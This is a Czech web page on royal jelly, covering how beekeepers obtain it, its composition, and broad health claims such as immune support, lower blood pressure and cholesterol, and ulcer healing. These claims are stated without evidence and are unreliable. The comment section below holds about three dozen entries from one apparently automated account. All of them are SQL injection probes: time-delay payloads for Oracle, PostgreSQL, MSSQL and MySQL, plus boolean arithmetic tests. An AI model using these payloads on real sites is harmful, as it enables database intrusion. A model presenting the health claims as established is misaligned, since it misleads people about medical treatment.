Mateří kašička je včelaři získávána z matečníku. K tomu ovšem musí navodit situaci, kdy odstraní matku, aby se včelstvo soustředilo na výchovu matky nové. Včelař vloží uměle připravené matečníky (komůrky) s jednodenními larvičkami. Tyto matečníky jsou poté zahrnuty mateří kašičkou. Včelař ji pak může odebrat. Má bílou až žlutavou barvu, hustší konzistence, chuť je nakyslá.

Obsah účinných látek

70% tvoří voda, dále jsou to cukry – glukóza, fruktóza, sacharóza, ribóza, erlóza.  Mastná kyselina 10hydroxy-delta 2decénová, jež má silné protibakteriální a antimykotické účinky. V mateří kašičce jsou také steroly, fenoly, fosfolipidy, vosky, kyselina pyrohroznová, glukuronová a pantothenová, aminokyseliny- kyselina asparagová, glutamová, prolin…, enzymy – glukooxidasa, fosfatasa, cholinesterasa, volné nukleotidy aj.

Z minerálů to jsou např. draslík, vápník, sodík, zinek, železo, měď, mangan. Z vitamínů jsou v ní zastoupeny v tucích rozpustné – A, D, E, K…

Vliv na zdraví

Tato kašička působí na organismus jako toniku, zvyšuje odolnost, podporuje regeneraci.

Je vhodná k posílení imunitního systému vůči virovým, mykotickým i bakteriálním nákazám. Pozitivně ovlivňuj krvetvorbu.

Pomáhá zpomalovat rozvoj aterosklerózy, normalizuje krevní tlak i hladinu cholesterolu v krvi. Působí i na psychiku a mozkovou činnost. Odstraňuje únavu a napomáhá klidnému spánku.

Při vnějším použiti se používá v krémech proti vráskám, ale aplikuje se také na kožní defekty, jelikož podporuje hojení a reparaci poškození tkáně.

Pomáhá při léčba zažívacích obtíží a např. žaludečních a duodenálních vředů. Také zlepšuje činnost jater.

 

Pozor by si ovšem měli dát alergici.

Zpět na hlavní článek Výživové doplňky.

 

Komentáře

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

8KrWzoOX')) OR 812=(SELECT 812 FROM PG_SLEEP(15))--

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

SgzTrdZd') OR 229=(SELECT 229 FROM PG_SLEEP(15))--

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

5wwl2DIq' OR 898=(SELECT 898 FROM PG_SLEEP(15))--

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1)) OR 627=(SELECT 627 FROM PG_SLEEP(15))--

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-5) OR 253=(SELECT 253 FROM PG_SLEEP(15))--

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-5 OR 901=(SELECT 901 FROM PG_SLEEP(15))--

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

0Lyrb3yG'; waitfor delay '0:0:15' --

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

1 waitfor delay '0:0:15' --

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1); waitfor delay '0:0:15' --

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1; waitfor delay '0:0:15' --

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

if(now()=sysdate(),sleep(15),0)

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1" OR 3*2>(0+5+58-58) --

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1" OR 3*2<(0+5+58-58) --

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1" OR 3+58-58-1=0+0+0+1 --

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1" OR 2+58-58-1=0+0+0+1 --

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1' OR 3*2>(0+5+511-511) or 'Qwp8M4Ta'='

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1' OR 3*2<(0+5+511-511) or 'Qwp8M4Ta'='

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1' OR 3+511-511-1=0+0+0+1 or 'Qwp8M4Ta'='

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1' OR 2+511-511-1=0+0+0+1 or 'Qwp8M4Ta'='

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1' OR 3*2>(0+5+806-806) --

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1' OR 3*2<(0+5+806-806) --

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1' OR 3+806-806-1=0+0+0+1 --

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1' OR 2+806-806-1=0+0+0+1 --

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1 OR 3*2>(0+5+806-806)

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1 OR 3*2<(0+5+806-806)

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1 OR 3+806-806-1=0+0+0+1

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1 OR 2+806-806-1=0+0+0+1

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1 OR 3*2>(0+5+410-410) --

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1 OR 3*2<(0+5+410-410) --

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1 OR 3+410-410-1=0+0+0+1 --

zjednoduseny-kd-61788a7d648131635289725
zjednoduseny-kd-61788a7d648131635289725 | před 2 lety

-1 OR 2+410-410-1=0+0+0+1 --

Zdravotní kalkulačka

:
: